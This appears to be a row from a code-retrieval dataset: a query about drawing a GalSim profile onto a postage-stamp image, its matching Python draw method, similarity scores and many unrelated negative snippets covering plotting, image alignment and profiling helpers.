axs[0, 2].legend(\r\n [p1, p2, p3],\r\n [\"LES:\"+r'$-\\langle u^\\prime w^\\prime \\rangle$',\r\n \"LES:\"+r'$-\\langle txz \\rangle$',\r\n \"LES:\"+r'$-(\\langle txz \\rangle + \\langle u^\\prime w^\\prime \\rangle)$'])\r\n\r\n #compare LES's profile of uu with that of D_US\r\n p1 = axs[1, 0].scatter(p.z_uv[0:zmax],\r\n Tavg.uuMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='b')\r\n if dns_profiles:\r\n p2, = axs[1, 0].plot(self.dns_z, self.dns_uu, 'b')\r\n \r\n if dns_profiles:\r\n axs[1, 0].legend([p1, p2], ['LES', 'DNS'])\r\n else:\r\n axs[1, 0].legend([p1], ['LES'])\r\n axs[1, 0].set(xlabel=r'$z/z_i$', ylabel=r'$\\langle u^\\prime u^\\prime \\rangle$',\r\n ylim=[0, 8])\r\n\r\n #compare LES's profile of ww with that of D_US\r\n axs[1, 1].scatter(p.z_uv[0:zmax],\r\n Tavg.vvMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='b')\r\n if dns_profiles:\r\n axs[1, 1].plot(self.dns_z, self.dns_vv, 'b')\r\n axs[1, 1].set(xlabel=r'$z/z_i$', ylabel=r'$\\langle v^\\prime v^\\prime \\rangle$',\r\n ylim=[0, 4])\r\n if dns_profiles:\r\n axs[1, 1].legend([p1, p2], ['LES', 'DNS'])\r\n else:\r\n axs[1, 1].legend([p1], ['LES'])\r\n\r\n #compare LES's profile of ww with that of DNS\r\n axs[1, 2].scatter(p.z_w[0:zmax],\r\n Tavg.wwMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='b')\r\n if dns_profiles:\r\n axs[1, 2].plot(self.dns_z, self.dns_ww, 'b')\r\n axs[1, 2].set(xlabel=r'$z/z_i$', ylabel=r'$\\langle w^\\prime w^\\prime \\rangle$',\r\n ylim=[0, 2])\r\n if dns_profiles:\r\n axs[1, 2].legend([p1, p2], ['LES', 'DNS'])\r\n else:\r\n axs[1, 2].legend([p1], ['LES'])\r\n fig.show()\r\n\r\n if p.avgScalar and Tavg is not None:\r\n fig, ax = plt.subplots(tight_layout=True)\r\n ax.scatter(p.z_w[0:zmax],\r\n Tavg.wpthetapMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='b')\r\n ax.scatter(p.z_w[0:zmax], Tavg.sgst3Mean, marker='o', c='w', edgecolors='c')\r\n ax.scatter(p.z_w[0:zmax],\r\n Tavg.wpthetapMean + Tavg.sgst3Mean,\r\n marker='o',\r\n c='w',\r\n edgecolors='k')\r\n ax.plot(p.z_w[0:zmax],p.wt_s*np.ones(zmax)/p.T_scale/p.u_star,'--')\r\n ax.set(xlabel=r'$z/z_i$', ylabel=r'$\\langle w^\\prime\\theta^\\prime \\rangle$',\r\n ylim=[-0.001, 0.001])\r\n fig.show()\r\n\r\n if p.domain_snapshots and Snap is not None:\r\n fig, ax = plt.subplots(tight_layout=True)\r\n Y, X = np.meshgrid(p.y, p.x)\r\n mappable = ax.pcolor(X, Y, Snap.ui[:, :, 4])\r\n ax.set(xlabel=r'$x/z_i$', ylabel=r'$y/z_i$', title=r'Streamwise velocity at z = ' + str(p.z_uv[4]))\r\n ax.axis(\"image\")\r\n fig.colorbar(mappable)\r\n fig.show()\r\n\r\n if p.x_snapshots and Snap_X is not None:\r\n fig, ax = plt.subplots(tight_layout=True)\r\n Z, Y = np.meshgrid(p.z_uv[0:zmax], p.y)\r\n mappable = ax.pcolor(Y, Z, Snap_X.ux)\r\n ax.set(xlabel=r'$y/z_i$', ylabel=r'$z/z_i$', title='Streamwise velocity at x = ' + str(p.nx_planes))\r\n ax.axis(\"image\")\r\n fig.colorbar(mappable)\r\n fig.show()\r\n\r\n if p.y_snapshots and Snap_Y is not None:\r\n fig, ax = plt.subplots(tight_layout=True)\r\n Z, X = np.meshgrid(p.z_uv[0:zmax], p.x)\r\n mappable = ax.pcolor(X, Z, Snap_Y.uy)\r\n ax.set(xlabel=r'$x/z_i$', ylabel=r'$z/z_i$', title='Streamwise velocity at y = ' + str(p.ny_planes))\r\n ax.axis(\"image\")\r\n fig.colorbar(mappable)\r\n fig.show()\r\n\r\n if p.z_snapshots and Snap_Z is not None:\r\n fig, ax = plt.subplots(tight_layout=True)\r\n Y, X = np.meshgrid(p.y, p.x)\r\n mappable = ax.pcolor(X, Y, Snap_Z.uz)\r\n ax.axis(\"image\")\r\n ax.set(xlabel=r'$x/z_i$', ylabel=r'$y/z_i$', title='Streamwise velocity at z = ' + str(p.nz_planes))\r\n fig.colorbar(mappable)\r\n fig.show()\r\n\r\n if p.points and Point is not None:\r\n fig, ax = plt.subplots(tight_layout=True)\r\n ax.plot(Point.t, Point.up, label='u')\r\n ax.plot(Point.t, Point.vp, label='v')\r\n ax.plot(Point.t, Point.wp, label='w')\r\n ax.set(xlabel=r'$t$', ylabel=r'$u/u_*$', xlim=[min(Point.t), max(Point.t)])\r\n ax.legend()\r\n fig.show()", "def test_propene(self):\n def draw(image: ShapeImage):\n image.add_line((400, 400), (500, 400))\n image.add_line((400, 410), (500, 410))\n image.add_line((500, 400), (587, 350))\n\n self._test_shape(\n image_size=(1000, 1000),\n expected_corners=np.array([\n [[400, 400]],\n [[500, 400]],\n [[587, 350]]\n ]),\n drawer=draw,\n expected_edges=np.array([\n [[400, 400, 500, 400]],\n [[400, 410, 500, 410]],\n [[500, 400, 587, 350]]\n ])\n )", "def prof2frame(prof):\n\n import pandas as pd\n\n # create data frame from profile dicts\n frame = pd.DataFrame(prof)\n\n # --------------------------------------------------------------------------\n # add a flag to indicate entity type\n def _entity (row):\n if not row['uid']:\n return 'session'\n if 'unit' in row['uid']:\n return 'unit'\n if 'pilot' in row['uid']:\n return 'pilot'\n return 'session'\n frame['entity'] = frame.apply(lambda row: _entity (row), axis=1)\n\n # --------------------------------------------------------------------------\n # add a flag to indicate if a unit / pilot / ... is cloned\n def _cloned (row):\n if not row['uid']:\n return False\n else:\n return 'clone' in row['uid'].lower()\n frame['cloned'] = frame.apply(lambda row: _cloned (row), axis=1)\n\n return frame", "def iou_suppression(cnt_box, yolo_box, max_threshold, min_threshold):\n all_boxes = []\n pre_bboxes = yolo_box\n bboxes = cnt_box\n for i in range(len(pre_bboxes)):\n max_flag = 0\n min_flag = 0\n for j in range(len(bboxes)):\n\n (pre_x1, pre_y1) = (pre_bboxes[i][0], pre_bboxes[i][1])\n (pre_x2, pre_y2) = (pre_bboxes[i][2], pre_bboxes[i][3])\n (cur_x1, cur_y1) = (bboxes[j][0], bboxes[j][1])\n (cur_x2, cur_y2) = (bboxes[j][2], bboxes[j][3])\n origin_w = pre_x2 - pre_x1\n origin_h = pre_y2 - pre_y1\n current_w = cur_x2 - cur_x1\n current_h = cur_y2 - cur_y1\n prime_area = origin_h * origin_w\n current_area = current_h*current_w\n\n if pre_x1 > cur_x1:\n if pre_y1 > cur_y1:\n if cur_x2 - pre_x1 <= 0 or cur_y2 - pre_y1 <= 0:\n lap_area = 0\n else:\n width = cur_x2 - pre_x1\n height = cur_y2 - pre_y1\n if width > origin_w:\n width = origin_w\n if height > origin_h:\n height = origin_h\n\n lap_area = width*height\n\n else:\n if cur_x2 - pre_x1 <= 0 or pre_y2 - cur_y1 <= 0:\n lap_area = 0\n else:\n width = cur_x2 - pre_x1\n height = pre_y2 - cur_y1\n if width > origin_w:\n width = origin_w\n if height > current_h:\n height = current_h\n\n lap_area = width*height\n else:\n if pre_y1 > cur_y1:\n if pre_x2 - cur_x1 <= 0 or cur_y2 - pre_y1 <= 0:\n lap_area = 0\n else:\n width = pre_x2 - cur_x1\n height = cur_y2 - pre_y1\n if width > current_w:\n width = current_w\n if height > origin_h:\n height = origin_h\n\n lap_area = width*height\n else:\n if pre_x2 - cur_x1 <= 0 or pre_y2 - cur_y1 <= 0:\n lap_area = 0\n else:\n width = pre_x2 - cur_x1\n height = pre_y2 - cur_y1\n if width > current_w:\n width = current_w\n if height > current_h:\n height = current_h\n\n lap_area = width*height\n\n if lap_area != 0:\n sum_area = (prime_area + current_area - lap_area)\n iou_score = lap_area/sum_area\n if iou_score > max_threshold: # set the threshold of the iou scores, in line with the sort\n max_flag = 1\n elif iou_score > min_threshold:\n min_flag = 1\n\n if max_flag == 1 or min_flag == 0:\n all_boxes.append(pre_bboxes[i])\n\n if cnt_box != []:\n for index_box in range(cnt_box.shape[0]):\n all_boxes.append(cnt_box[index_box])\n\n return np.asarray(all_boxes)" ]
[ "0.6533734", "0.51599497", "0.47828445", "0.47232333", "0.45972005", "0.45731962", "0.45694324", "0.45572576", "0.45465982", "0.45340365", "0.44940332", "0.44605252", "0.44413173", "0.44082165", "0.4281743", "0.4263862", "0.42636248", "0.42611814", "0.42450166", "0.42342076", "0.4228299", "0.42116234", "0.4206318", "0.42003477", "0.41977915", "0.41658568", "0.41562256", "0.41488603", "0.4140673", "0.41311204", "0.40905902", "0.4088185", "0.40718707", "0.4056747", "0.40441948", "0.40420005", "0.4039595", "0.40303034", "0.40242964", "0.40105534", "0.40027088", "0.40022877", "0.3991677", "0.398981", "0.39851663", "0.39722535", "0.39696342", "0.39622208", "0.39426336", "0.39404994", "0.3938015", "0.3936895", "0.39338621", "0.3921276", "0.39073977", "0.39037496", "0.39008337", "0.3895338", "0.38913122", "0.3885896", "0.3884199", "0.38749436", "0.38694957", "0.38611177", "0.38552186", "0.38543135", "0.38508406", "0.38423482", "0.38373587", "0.38370582", "0.38195834", "0.38184926", "0.381795", "0.3817473", "0.3807116", "0.38061726", "0.37901014", "0.37884796", "0.37860972", "0.37798375", "0.37740415", "0.37733015", "0.37731147", "0.3772506", "0.37702903", "0.3758757", "0.37558293", "0.37515476", "0.3747827", "0.37421316", "0.37336633", "0.37335995", "0.37334308", "0.37331188", "0.37310427", "0.3730547", "0.3726281", "0.37252617", "0.37227973", "0.37178838" ]
0.67846763
0
Draw the profile on the postage stamp image. This is a slightly modified version of `stamp.DrawBasic()` which allows drawing of chromatic objects. prof The profile to draw. image The image onto which to draw the profile (which may be None). method The method to use in drawImage. offset The offset to apply when drawing. config The configuration dict for the stamp field. base The base configuration dict. logger If given, a logger object to log progress. the resulting image
def draw(self, prof, image, method, offset, config, base, logger, **kwargs): # ... draw prof onto the given image (making a new Image if necessary) if prof is None: return image else: logger = galsim.config.LoggerWrapper(logger) # Setup the kwargs to pass to drawImage # (Start with any additional kwargs given as extra kwargs to DrawBasic and add to it.) kwargs['image'] = image kwargs['offset'] = offset kwargs['method'] = method if 'wmult' in config and 'wmult' not in kwargs: # pragma: no cover kwargs['wmult'] = galsim.config.ParseValue(config, 'wmult', base, float)[0] if 'wcs' not in kwargs and 'scale' not in kwargs: kwargs['wcs'] = base['wcs'].local(image_pos = base['image_pos']) if method == 'phot' and 'rng' not in kwargs: kwargs['rng'] = galsim.config.GetRNG(config, base, logger, "method='phot'") # Check validity of extra phot options: max_extra_noise = None if 'n_photons' in config and 'n_photons' not in kwargs: if method != 'phot': raise AttributeError('n_photons is invalid with method != phot') if 'max_extra_noise' in config: logger.warning( "Both 'max_extra_noise' and 'n_photons' are set in config dict, "+ "ignoring 'max_extra_noise'.") kwargs['n_photons'] = galsim.config.ParseValue(config, 'n_photons', base, int)[0] elif 'max_extra_noise' in config: max_extra_noise = galsim.config.ParseValue(config, 'max_extra_noise', base, float)[0] if method != 'phot' and max_extra_noise is not None: raise AttributeError('max_extra_noise is invalid with method != phot') if 'poisson_flux' in config and 'poisson_flux' not in kwargs: if method != 'phot': raise AttributeError('poisson_flux is invalid with method != phot') kwargs['poisson_flux'] = galsim.config.ParseValue(config, 'poisson_flux', base, bool)[0] if max_extra_noise is not None and 'max_extra_noise' not in kwargs: if max_extra_noise < 0.: raise ValueError("image.max_extra_noise cannot be negative") if 'image' in base and 'noise' in base['image']: noise_var = galsim.config.CalculateNoiseVariance(base) else: raise AttributeError("Need to specify noise level when using max_extra_noise") if noise_var < 0.: raise ValueError("noise_var calculated to be < 0.") max_extra_noise *= noise_var kwargs['max_extra_noise'] = max_extra_noise if logger.isEnabledFor(logging.DEBUG): # Don't output the full image array. Use str(image) for that kwarg. alt_kwargs = dict([(k,str(kwargs[k]) if isinstance(kwargs[k],galsim.Image) else kwargs[k]) for k in kwargs]) logger.debug('obj %d: drawImage kwargs = %s',base.get('obj_num',0), alt_kwargs) logger.debug('obj %d: prof = %s',base.get('obj_num',0),prof) try: # NOTE: Old version: # image = prof.drawImage(**kwargs) if isinstance(prof, galsim.GSObject): image = prof.drawImage(**kwargs) elif isinstance(prof, galsim.ChromaticObject): bp = {} for key in (self._req_bp_fields+self._opt_bp_fields): try: bp[key] = config['bandpass'][key] except KeyError: bp[key] = None bandpass = galsim.Bandpass(blue_limit=bp['blue_limit'], red_limit=bp['red_limit'], wave_type=bp['wave_type'], throughput=bp['throughput'], zeropoint=bp['zeropoint']) image = prof.drawImage(bandpass=bandpass, **kwargs) except Exception as e: # pragma: no cover logger.debug('obj %d: prof = %r', base.get('obj_num',0), prof) raise return image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def updateSkip(self, prof, image, method, offset, config, base, logger):\n\n # NOTE: There are currently unresolved issues with the image size checking of chromatic\n # objects. For now, we ignore any possible speed increases and skip the check.\n # if isinstance(prof, galsim.ChromaticObject):\n # return False\n\n if prof is not None and base.get('current_image',None) is not None:\n if image is None:\n prof = base['wcs'].toImage(prof, image_pos=base['image_pos'])\n # NOTE: Old version:\n # N = prof.getGoodImageSize(1.)\n if isinstance(prof, galsim.GSObject):\n N = prof.getGoodImageSize(1.)\n elif isinstance(prof, galsim.ChromaticObject):\n # TODO: Finish implementation\n # return False\n pudb.set_trace()\n # Find the suggested image size for each object given the choice of scale, and use the\n # maximum just to be safe.\n print '\\nprof.original = {}'.format(prof.original)\n print '\\nprof.original.obj_list = {}'.format(prof.original.obj_list)\n # print '\\nprof.objlist = {}'.format(prof.original.obj_list)\n obj_list = prof.original.obj_list\n possible_im_sizes = []\n for obj in obj_list:\n print '\\n obj : {}'.format(obj)\n possible_im_sizes.append([ ob.getGoodImageSize(1.) for ob in obj])\n print 'possible_im_sizes : {}'.format(possible_im_sizes)\n N = np.max(possible_im_sizes)\n N += 2 + int(np.abs(offset.x) + np.abs(offset.y))\n bounds = galsim._BoundsI(1,N,1,N)\n else:\n bounds = image.bounds\n\n # Set the origin appropriately\n stamp_center = base['stamp_center']\n if stamp_center:\n bounds = bounds.shift(stamp_center - bounds.center)\n else:\n bounds = bounds.shift(base.get('image_origin',galsim.PositionI(1,1)) -\n galsim.PositionI(bounds.xmin, bounds.ymin))\n\n overlap = bounds & base['current_image'].bounds\n if not overlap.isDefined():\n logger.info('obj %d: skip drawing object because its image will be entirely off '\n 'the main image.', base['obj_num'])\n return True\n\n return False", "def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):\n\n try:\n __import__(\"gobject\")\n from thirdparty.gprof2dot import gprof2dot\n from thirdparty.xdot import xdot\n import gtk\n import pydot\n except ImportError as ex:\n errMsg = \"profiling requires third-party libraries ('%s') \" % getSafeExString(ex)\n errMsg += \"(Hint: 'sudo apt-get install python-pydot python-pyparsing python-profiler graphviz')\"\n logger.error(errMsg)\n\n return\n\n if profileOutputFile is None:\n profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"sqlmap_profile.raw\")\n\n if dotOutputFile is None:\n dotOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"sqlmap_profile.dot\")\n\n if imageOutputFile is None:\n imageOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"sqlmap_profile.png\")\n\n if os.path.exists(profileOutputFile):\n os.remove(profileOutputFile)\n\n if os.path.exists(dotOutputFile):\n os.remove(dotOutputFile)\n\n if os.path.exists(imageOutputFile):\n os.remove(imageOutputFile)\n\n infoMsg = \"profiling the execution into file '%s'\" % profileOutputFile\n logger.info(infoMsg)\n\n # Start sqlmap main function and generate a raw profile file\n cProfile.run(\"start()\", profileOutputFile)\n\n infoMsg = \"converting profile data into a dot file '%s'\" % dotOutputFile\n logger.info(infoMsg)\n\n # Create dot file by using extra/gprof2dot/gprof2dot.py\n # http://code.google.com/p/jrfonseca/wiki/Gprof2Dot\n dotFilePointer = codecs.open(dotOutputFile, 'wt', UNICODE_ENCODING)\n parser = gprof2dot.PstatsParser(profileOutputFile)\n profile = parser.parse()\n profile.prune(0.5 / 100.0, 0.1 / 100.0)\n dot = gprof2dot.DotWriter(dotFilePointer)\n dot.graph(profile, gprof2dot.TEMPERATURE_COLORMAP)\n dotFilePointer.close()\n\n infoMsg = \"converting dot file into a graph image '%s'\" % imageOutputFile\n logger.info(infoMsg)\n\n # Create graph image (png) by using pydot (python-pydot)\n # http://code.google.com/p/pydot/\n pydotGraph = pydot.graph_from_dot_file(dotOutputFile)\n\n # Reference: http://stackoverflow.com/questions/38176472/graph-write-pdfiris-pdf-attributeerror-list-object-has-no-attribute-writ\n if isinstance(pydotGraph, list):\n pydotGraph = pydotGraph[0]\n\n try:\n pydotGraph.write_png(imageOutputFile)\n except OSError:\n errMsg = \"profiling requires graphviz installed \"\n errMsg += \"(Hint: 'sudo apt-get install graphviz')\"\n logger.error(errMsg)\n else:\n infoMsg = \"displaying interactive graph with xdot library\"\n logger.info(infoMsg)\n\n # Display interactive Graphviz dot file by using extra/xdot/xdot.py\n # http://code.google.com/p/jrfonseca/wiki/XDot\n win = xdot.DotWindow()\n win.connect('destroy', gtk.main_quit)\n win.set_filter(\"dot\")\n win.open_file(dotOutputFile)\n gtk.main()", "def addProfile(self, profile, color=None, close=False):\n if close:\n e1 = profile[0] # should always be a point\n if e1[0] != 0.0:\n profile = [(0.0, e1[1])] + profile\n e2 = profile[-1]\n if e2[0] != 0.0:\n if len(e2) == 2:\n profile.append((0.0, e2[1]))\n else:\n # profile ends in an arc\n profile.append((0.0, e2[0][1]))\n # previous line start x/y, for line -> arc\n px1 = py1 = None\n for e1, e2 in windowItr(profile, 2, 1):\n if e2 is None:\n break\n le1 = len(e1)\n le2 = len(e2)\n # line or start -> line\n if le1 == 2 and le2 == 2:\n x1, y1 = e1\n x2, y2 = e2\n self.blendTangent(False)\n patch = Patch.fromRevLineSeg(x1, y1, x2, y2, self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n px1 = x1\n py1 = y1\n # line or start -> arc\n elif le1 == 2 and le2 == 3:\n x1, y1 = e1\n (x2, y2), (cx, cy), d = e2\n if px1 is not None:\n self.blendTangent(self._isLineTanToArc(px1, py1, x1, y1,\n cx, cy, d))\n patch = Patch.fromRevArcSeg(x1, y1, x2, y2, cx, cy, d, self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n # arc -> line\n elif le1 == 3 and le2 == 2:\n (aex, aey), (cx, cy), d = e1\n lex, ley = e2\n self.blendTangent(self._isLineTanToArc(lex, ley, aex, aey, cx,\n cy, d))\n patch = Patch.fromRevLineSeg(aex, aey, lex, ley, self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n px1 = aex\n py1 = aey\n # arc -> arc\n else:\n (x1, y1), (cx1, cy1), d1 = e1\n (x2, y2), (cx2, cy2), d2 = e2\n self.blendTangent(self._isArcTangentToArc(x1, y1, cx1, cy1,\n cx2, cy2))\n patch = Patch.fromRevArcSeg(x1, y1, x2, y2, cx2, cy2, d2,\n self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n self._bbox = BBox.fromVertices(self._sharedVertices)", "def testDiagonalProfile(self):\n # Use Plot backend widget to submit mouse events\n widget = self.plot.getWidgetHandle()\n\n self.plot.addImage(\n numpy.arange(100 * 100).reshape(100, -1))\n\n for method in ('sum', 'mean'):\n with self.subTest(method=method):\n # 2 positions to use for mouse events\n pos1 = widget.width() * 0.4, widget.height() * 0.4\n pos2 = widget.width() * 0.6, widget.height() * 0.6\n\n # Trigger tool button for diagonal profile mode\n self.toolBar.lineAction.trigger()\n\n # draw profile line\n widget.setFocus(qt.Qt.OtherFocusReason)\n self.mouseMove(widget, pos=pos1)\n self.qWait(100)\n self.mousePress(widget, qt.Qt.LeftButton, pos=pos1)\n self.qWait(100)\n self.mouseMove(widget, pos=pos2)\n self.qWait(100)\n self.mouseRelease(widget, qt.Qt.LeftButton, pos=pos2)\n self.qWait(100)\n\n manager = self.toolBar.getProfileManager()\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n roi = manager.getCurrentRoi()\n self.assertIsNotNone(roi)\n roi.setProfileLineWidth(3)\n roi.setProfileMethod(method)\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n curveItem = roi.getProfileWindow().getCurrentPlotWidget().getAllCurves()[0]\n if method == 'sum':\n self.assertTrue(curveItem.getData()[1].max() > 10000)\n elif method == 'mean':\n self.assertTrue(curveItem.getData()[1].max() < 10000)\n\n # Remove the ROI so the profile window is also removed\n roiManager = manager.getRoiManager()\n roiManager.removeRoi(roi)\n self.qWait(100)", "def prepocessImg(self, method, size, img, bb,offset=0.3,gray=True,\n boundry=False, outputDebug=False,outputprefix=None):\n if method == 'crop':\n crop_img = crop_only(img,bb.left(),bb.top(),bb.width(),bb.height(),offset,size)\n elif method == 'affine':\n img = Image.fromarray(img)\n if self.predictor == None:\n raise Exception(\"Error: method affine should initial with an facepredictor.\")\n alignPoints = self.align(img, bb)\n (xs, ys) = zip(*alignPoints)\n (l, r, t, b) = (min(xs), max(xs), min(ys), max(ys))\n w,h = img.size\n if boundry and (l < 0 or r > w or t < 0 or b > h):\n raise AliError('face out of boundry')\n \n left_eye_l = alignPoints[36]\n left_eye_r = alignPoints[39]\n left_eye = (np.array(left_eye_l)+np.array(left_eye_r))/2\n right_eye_l = alignPoints[42]\n right_eye_r = alignPoints[45]\n right_eye = (np.array(right_eye_l)+np.array(right_eye_r))/2\n crop_img = crop_simi(img,left_eye,right_eye,(offset,offset),(size,size))\n im_buffer = cStringIO.StringIO()\n crop_img.save(im_buffer, format=\"JPEG\")\n im_str = base64.b64encode(im_buffer.getvalue())\n else:\n raise Exception(\"undefined crop method\")\n if gray:\n crop_img = crop_img.convert('L')\n if outputDebug:\n dirname = './aligndebug'\n if not os.path.exists(os.path.abspath(dirname)):\n os.mkdir(dirname)\n drawbox(img,(bb.left(),bb.right(),bb.top(),bb.bottom()))\n if method == 'affine':\n drawpoint(img,left_eye)\n drawpoint(img,right_eye)\n img.save('{}/{}_annotated.jpg'.format(dirname,outputprefix))\n crop_img.save('{}/{}_crop.jpg'.format(dirname,outputprefix))\n crop_img = np.array(crop_img,dtype=np.float32) #look carefully on data format\n if crop_img.ndim == 3: #data shape for caffe\n return crop_img,score\n elif crop_img.ndim == 2:\n bbox = [bb.left(),bb.top(),bb.right(),bb.bottom()]\n return crop_img[:,:,np.newaxis], bbox\n else:\n raise Exception(\"wrong dimension\")", "def set_profile(self, profile='default'):\n\n # parameters used by various subclasses\n # each set is indexed by a name, called a profile\n # Note that each parameter must also be listed in set_params method in order to get set\n self.profile = profile\n self.params = {\n 'default' : {\n 'chans': n.array(range(5,59)), # channels to read\n 'dmarr' : [44.,88.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': -107.6177, # longitude of the array center (vla)\n 'lat': 34.07875 # latitude of the array center (vla)\n },\n 'vlacrab' : {\n 'chans': n.array(range(5,59)), # channels to read\n 'dmarr' : [29.,58.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': -107.6177, # longitude of the array center\n 'lat': 34.07875 # latitude of the array center\n },\n 'psa' : {\n 'chans': n.array(range(140,150)), # channels to read\n 'dmarr' : [0.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': 21.411, # longitude of the array center\n 'lat': -30.721 # latitude of the array center\n },\n 'pocob0329' : {\n 'chans': n.array(range(5,59)), # channels to read\n 'dmarr' : [0, 13.4, 26.8, 40.2, 53.5], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.005, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': -121.470, # longitude of the array center\n 'lat': 40.817 # latitude of the array center\n },\n 'mwa' : {\n 'chans': n.array(n.arange(128)), # channels to read\n 'dmarr' : [0, 50.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': 116.671, # longitude of the array center\n 'lat': -26.703 # latitude of the array center\n }\n }\n\n \n self.pathout = self.params[self.profile]['pathout']\n self.chans = self.params[self.profile]['chans']\n self.dmarr = self.params[self.profile]['dmarr']\n self.pulsewidth = self.params[self.profile]['pulsewidth'] * n.ones(len(self.chans))\n self.approxuvw = self.params[self.profile]['approxuvw']\n self.beam_params = self.params[self.profile]['beam_params']\n self.long = self.params[self.profile]['long']\n self.lat = self.params[self.profile]['lat']", "def tool_draw_point(self,img,point,color=[0,0,0]):\n def s(pos):\n return int((pos + 1) / 2 * 128)\n if point is None:\n print(\"Warn: tool_draw_point Fail => point is None\")\n return img\n x, y = s(point[0]), s(point[1])\n img = cv2.rectangle(img, (x, y), (x, y), color, 5)\n return img", "def plot_profile(outdir, xval='x', xscale=1, yscale=1, comp2los=False, adjustRadial=False,\n fig=True):\n #Load data\n path = os.path.join(outdir,'points.h5')\n x,y,z,ux,uy,uz = pu.extract_points(path)\n\n Y = uz / yscale\n if xval == 'x':\n X = x / xscale\n Y1 = ux / yscale\n elif xval == 'r':\n X = np.hypot(x,y) / xscale\n ur = np.hypot(ux,uy)\n Y1 = ur / yscale\n if adjustRadial: #fix sign from hypot square root\n ur = pu.radial2negative(Y1)\n\n if fig:\n plt.figure()\n # otherwise profile added to active plot\n\n #plt.plot(X,uy/yscale,'r.-',label='Uy') #should be zero along EW axis\n de = 90e3 / xscale #eastern data extent\n if comp2los != False:\n data_extents = (X<=de)\n if comp2los == 'west': #switch sign of radial profile\n #ux = -ux #move to comp2los function\n X = -X\n Y1 = -Y1\n de = -de\n data_extents = (X>=de)\n\n los = pu.comp2los(x,ux,uy,uz,track=comp2los)\n plt.plot(X, los/yscale, 'k-', lw=2, label='Ulos_' + comp2los)\n plt.fill_between(X,los/yscale, where=data_extents, color='gray',alpha=0.5)\n\n plt.plot(X, Y, 'b-', lw=2, label='Uz')\n plt.plot(X, Y1, 'b--',lw=2, mfc='None',label='U{0}'.format(xval))\n\n # Annotate\n plt.title(outdir)\n plt.xlabel('Distance [{}]'.format(get_unit(xscale)))\n plt.ylabel('Uz [{}]'.format(get_unit(yscale)))\n plt.axhline(color='k')\n plt.axvline(de,color='k', linestyle='dashed', label='EW data extent') #EW extent of InSAR coverage\n plt.legend(loc='best')\n plt.grid(True)\n plt.show()", "def profile(self, profile):\n\n self.width = profile['width']\n self.height = profile['height']\n self.crs = profile['crs']\n self.interleave = profile['interleave']\n self.resampling = profile['resampling']", "def writeProfile(fname,prof):\n t = np.linspace(0,1,prof.shape[0],endpoint=False)\n fh = open(fname,'w')\n for x in range(prof.shape[0]):\n fh.write('%.7e %.7e\\n' % (t[x],prof[x]))\n fh.close()", "def paintAvatar(self):\n self.paintBody()\n self.paintShoes()\n if self.avatarConfiguration[\"gender\"] == \"boy\":\n self.paintShirt()\n self.paintTrousers()\n else:\n self.paintSkirt()\n self.paintHead()\n self.paintHair()\n self.paintMask()", "def CreateProfileLikelihoodPlot(model, data, poi):\n\n nll = model.createNLL(data);\n profile = nll.createProfile(ROOT.RooArgSet(poi)); \n\n frame = poi.frame();\n ROOT.RooStats.HistFactory.FormatFrameForLikelihood(frame)\n\n nll.plotOn(frame, ROOT.RooCmdArg(\"ShiftToZero\",True), \n ROOT.RooCmdArg(\"LineColor\",ROOT.kRed), \n ROOT.RooCmdArg(\"LineStyle\",ROOT.kDashed) );\n profile.plotOn(frame);\n frame.SetMinimum(0);\n frame.SetMaximum(2.);\n canvas = ROOT.TCanvas( \"Profile Likelihood\", \"\", 800,600);\n frame.Draw(\"goff\");\n png_string = CanvasToPngString(canvas)\n return png_string", "def PlotProfile():\n (metadata, data) = Parse('/tmp/sdcard-scalability.txt')\n gp = Gnuplot.Gnuplot(persist=1)\n gp('set data style impulses')\n gp('set xtics 1')\n gp('set pointsize 2')\n gp.clear()\n gp.xlabel('writer process')\n gp.ylabel('duration in second')\n gp.title(metadata.AsTitle())\n\n dataset = data[0]\n x = numpy.array(dataset.time, dtype='int_')\n d = Gnuplot.Data(x, dataset.data,\n title=dataset.name,\n with_='linespoints')\n gp.replot(d)\n gp.hardcopy('/tmp/%s-%s-%f.png' %\n (metadata.name, metadata.kernel, metadata.duration),\n terminal='png')", "def _atexit_print_fn():\n if config.profile:\n to_sum = []\n\n if config.profiling__destination == \"stderr\":\n destination_file = \"<stderr>\"\n elif config.profiling__destination == \"stdout\":\n destination_file = \"<stdout>\"\n 